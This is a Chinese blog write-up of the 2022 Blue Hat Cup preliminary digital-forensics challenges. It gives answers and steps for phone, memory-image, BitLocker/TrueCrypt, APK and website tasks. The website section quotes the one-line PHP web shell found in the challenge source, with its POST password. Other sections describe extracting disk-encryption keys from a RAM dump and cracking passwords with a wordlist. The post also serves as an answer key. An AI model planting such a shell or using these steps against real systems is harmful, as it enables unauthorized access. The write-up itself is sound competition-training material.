2022蓝帽杯初赛电子取证

最新推荐文章于 2023-09-23 19:32:37 发布
最新推荐文章于 2023-09-23 19:32:37 发布
阅读量1.2k 收藏 4
点赞数 2
分类专栏: 取证 文章标签: 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wow0524/article/details/126654542
版权

手机取证 

1. 627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?[答案格式:19201080]

360360

直接搜索-表格视图

 2. 姜总的快递单号是多少?[答案格式:QA1234567890]

SF1142358694796

计算机取证

1. 从内存镜像中获得开机密码是多少?

anxinqi

内存镜像是1.dmp

2. 制作该内存镜像的进程Pid号是多少?[答案格式:1024]

2192

MagnetRAMCaptu是内存镜像取证工具 

3. bitlokcer分区某office文件中存在flag?[答案格式:flag{abCd1234}]

flag{b27867b66866866686866883bb43536}

工具集-内存镜像取证工具-在1.dmp中搜索bitlocker密钥

生成密钥文件后,bitlocker解密,发现里面有加密文件,需要密码

txt文档里面有一个密码本,根据密码本爆破得到密码287fuweiuhfiute,只读能打开

4. Tc加密存在flag是什么?[答案格式:flag{abCd1234}]

flag{1349934913913991394cacacacacacc} 

wp:2022蓝帽杯初赛取证部分wp(详细)_DrN0rman的博客-CSDN博客_蓝帽杯题目

加密的文档中还有我天.docx和新建文本文档.txt,新建文本文档.txt20MB大的很奇怪,猜测是被truecrypt加密的对象,改后缀为.hc,用取证大师加载后解密,密钥来自工具集-内存镜像取证工具,在1.dmp中能搜到truecrypt密钥

解密后得到一个加密的哈哈哈.zip,爆破得密码991314,解压得flag

程序分析

1. 程序包名是?[答案格式:abv.va.as]

exec.azj.kny.d.c

2. 程序的入口是?[答案格式:asd.xda.asd.ca] 

minmtta.hemjcbm.ahibyws.MainActivity

雷电APP解析上三个android:name都显示了,反编译后感觉最前面的是

3. 程序的服务器地址的密文是?[答案格式:asdqwewe]

aHR0cHM6Ly9hbnNqay5lY3hlaW8ueHl6

在上题的程序入口中看到一段密文

解密后看到网址

4. 程序实现安全检测的类的名称是?[答案格式:cla]

a

直接搜索安全,双击函数名a(),显示类a

网站取证

据了解,某网上商城系一团伙日常资金往来用,从2022年4月1日起使用虚拟币GG币进行交易,现已获得该网站的源代码以及部分数据库备份文件,请您对以下问题进行分析解答。

1.请从网站源码中找出木马文件,并提交木马连接的密码。(答案参考格式:abcABC123)

lanmaobei666

用火绒对文件进行查杀可以找到木马0f71e181346d43e56722aec663e5d4e9.php

打开后可以看到密码 

<?php assert(@$_POST['lanmaobei666']); ?>

2. 请提交数据库连接明文密码。[答案格式:Abc123]

KBLT123

wp参考官方wp

查看数据库配置文件/application/database.php

<?php
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);
    return $dencrypted;
}

PHP5.4可以运行,感谢wzx

3.请提交数据库金额加密混淆使用的盐值。[答案格式:Abc123]

jyzg123456

查看bak.sql发现tab_channel_order_list和money有关,应该是用来存储金额的

在www文件夹中查找tab_channel_order_list,找到盐值

4.请计算张宝2022-04-02 00:00:00-2022-04-18 23:59:59累计转账给王子豪多少RMB?[答案格式:123.66

15758353.76 

五五六六0524
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
电子取证】手机取证(第六届”蓝帽杯“全国大学生网络安全技能大赛).7z.002
07-13
第六届”蓝帽杯“全国大学生网络安全技能大赛
2022第六届蓝帽杯初赛学习
Tummyiii的博客
09-23 244
做完之后,发现蓝帽杯是有传承的,但服务器这块还算很熟,请参考大佬的文章。
蓝帽杯2022初赛 部分wp
akxnxbshai的博客
07-10 835
蓝帽杯2022初赛部分wp
2023年第七届蓝帽杯初赛-取证部分
weixin_63576152的博客
08-28 2479
盘古石里查找聊天记录盘古石里查找聊天记录盘古石中可以找到2023-06-21 01:01:25。
2021第五届蓝帽杯初赛取证复现1
wha1e的博客
05-15 2205
嫌疑人X的硬盘
2021年长安杯电子数据取证比赛复盘完整版(wp)
flyable的博客
08-29 1万+
2021年长安杯电子数据取证比赛复盘完整版(wp)
电子取证】程序分析(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
电子取证】计算机取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-13
第六届”蓝帽杯“全国大学生网络安全技能大赛
第六届蓝帽杯初赛取证检材百度云链接,四个检材完整版一次性下载
08-28
蓝帽杯”全国大学生网络安全技能大赛已连续举办六届,成为面向全国公安院校和普通高校大学生的高规格、强影响力的实战技能大赛,被誉为未来网警的“奥运会”。“蓝帽杯”由公安部网络安全保卫局、教育部教育管理...
第六届”蓝帽杯“全国大学生网络安全技能大赛WriteUp
qq_45603443的博客
07-09 2370
第六届蓝帽杯全国大学生网络安全技能大赛 Writeup
2022蓝帽杯初赛
2202_75317918的博客
08-16 183
蓝帽杯 2022 初赛
2022蓝帽杯初赛wp
mumuzi的博客
07-10 5040
2022蓝帽初赛
【BUUCTF】Misc题解
热门推荐
xuanyulevel6的博客
07-31 1万+
BUUCTF-Misc题解
2022长安杯-wp
weixin_61167540的博客
11-21 655
2022长安杯案情背景:某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用”USTD币“购买所谓的"HT币”,受害人充值后不但 “HT币”无法提现、交易,而且手机还被恶意软件锁定勒索。打开star_web.sh后里面就有jar包的启动顺序,可以将启动脚本放在检材一中启动,也可以根据启动命令顺序手动启动jar包,然后查看端口是否开启,到9090端口为网站管理。检材1中,网站jar包所存放的目录是(答案为绝对路径,如“/home/honglian/”)检材1系统中,网卡绑定的静态IP地址为。
2023第七届蓝帽杯 初赛 web LovePHP
Jay17的博客
08-29 1310
2023第七届蓝帽杯 初赛 web LovePHP
蓝帽杯2022 pwn Bank
z1r0的博客
07-12 521
保护全开 这道题其实逆清楚了基本就可以解出来了 这里是输入对应的单词就可以进入对应的功能 先看一下Deposit功能 先判断是否login,接着输入多少钱,然后判断一下card_money钱是否足够,如何足够则总钱+输入的,这个函数没什么用。 看一下put函数 这里就是需要存放的钱,判断是否小于总钱。并将需要存放的钱放入card_money中 接下来再看login函数 输入card_numbers,需要过检测 长度大于0,并在0-9之间,接下来输入密码的时候长度需要大于5,也是0-9 满足上面
网络空间安全市赛Misc一道简单的流量分析题
Mark的博客
11-28 1万+
这道题给了一个流量包,内部分了7个小题 1:首先可以在导出HTTP中查看攻击流量 第一题的flag答案便是: [172.16.1.101] 2、查端口,我们找到黑客ip后便过滤ip,输入ip.addr==172.16.1.102 往下分析你会发现很集中的有端口扫描现象,黑客是通过37113来扫描的,你只需要看这些便可,便能得到flag,所以第二题flag为[21,23,80,445,3389,5007] 3/4两题、要分析出黑客最终获得的用户名就得找到黑客什么时候登录的,攻击点在哪里,那就用
2023蓝帽杯半决赛取证部分(逆向题详细版)
weixin_63761288的博客
09-21 1026
(标题前标*的我们不能肯定,官方答案还没出来,但应该是对的)
2023蓝帽杯初赛misc下载
最新发布
12-04
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手需要前往蓝帽杯竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取题目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous题目的解析和答题。首先,解压下载的文件,查看所提供的题目资源、源代码或二进制文件等。根据题目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问题的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解题过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问题的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023蓝帽杯初赛misc下载是参赛选手在参加蓝帽杯网络安全竞赛中所需进行的一项任务。选手需要在蓝帽杯官方网站或相关论坛上获取下载链接并下载题目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解题思维和团队合作能力都提出了较高的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值